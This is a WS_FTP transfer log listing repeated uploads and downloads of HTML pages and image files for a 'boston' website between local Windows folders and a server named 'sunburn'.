10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
